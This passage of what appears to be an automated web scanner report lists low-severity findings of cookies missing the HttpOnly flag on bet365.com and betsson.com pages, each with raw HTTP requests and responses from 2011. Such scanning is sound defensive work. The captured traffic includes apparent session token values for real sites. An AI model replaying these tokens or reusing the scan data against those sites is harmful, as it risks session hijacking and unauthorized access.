The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bg/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:14 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 22016
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=19; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.49. http://www.bet365.com/cs/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /cs/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cs/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:14 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 19963
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=24; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.50. http://www.bet365.com/da/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /da/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /da/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:07 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 19976
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=7; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.51. http://www.bet365.com/de/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /de/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /de/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:57 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 20266
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=5; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.52. http://www.bet365.com/el/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /el/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /el/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:14 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 23118
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=20; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.53. http://www.bet365.com/en/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /en/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/ HTTP/1.1
Host: www.bet365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:40:48 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Cteonnt-Length: 21671
Content-Type: text/html
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=1; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private
Content-Length: 21671

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.54. http://www.bet365.com/en/default.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /en/default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/default.asp HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:44 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 21671
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=1; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.55. http://www.bet365.com/es/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /es/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /es/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:56 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 21591
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=3; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.56. http://www.bet365.com/home/iface.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /home/iface.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/iface.asp HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:46 GMT
X-Powered-By: ASP.NET
Content-Length: 66351
Content-Type: text/html; Charset=utf-8
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: session=processform=0&id=%7BDCFCF7D6%2D69D8%2D4D73%2DA5C0%2DE5C8423F2FF9%7D&stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=oty=1&cf=N&ct=198&tzi=1&hd=N&lng=1; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html xmlns:nav="http://www.bet365.co.uk/ns/menus" xmlns:rs="urn:schemas-microsoft-com:rowset" xmlns:z="#RowsetSchema" xmlns:fo="http://www.w3.org/1999/XSL/Format" xmlns:lif="http://www.bet365.co.uk/n
...[SNIP]...

12.57. http://www.bet365.com/hu/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /hu/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hu/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:15 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 20269
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=25; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.58. http://www.bet365.com/it/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /it/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /it/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:01 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 19872
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=6; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.59. http://www.bet365.com/nn/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /nn/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nn/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:12 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 19950
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=9; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.60. http://www.bet365.com/pl/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /pl/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pl/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:14 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 19795
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=21; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.61. http://www.bet365.com/pt/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /pt/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pt/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:06 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 20194
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=22; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.62. http://www.bet365.com/ro/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /ro/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ro/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:14 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 20212
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=23; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.63. http://www.bet365.com/sk/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /sk/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sk/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:16 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 20172
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=26; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.64. http://www.bet365.com/sv/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /sv/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sv/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:12 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 21536
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=8; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.65. http://www.bet365.com/zh-CHS/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /zh-CHS/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /zh-CHS/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:12 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 19796
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=10; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.66. http://www.bet365.com/zh-CHT/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bet365.com
Path:   /zh-CHT/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /zh-CHT/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:14 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 19787
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=2; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.67. https://www.betsson.com/en/about/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/about/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/about/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: http://about.betsson.com/en/
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAQQDRSDT=OIEEAKPDPIECBJMMIOMNPPEC; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:43 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/


12.68. https://www.betsson.com/en/about/company-information/payments-and-security/index.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/about/company-information/payments-and-security/index.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/about/company-information/payments-and-security/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: http://about.betsson.com/en/licenses-and-security/
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
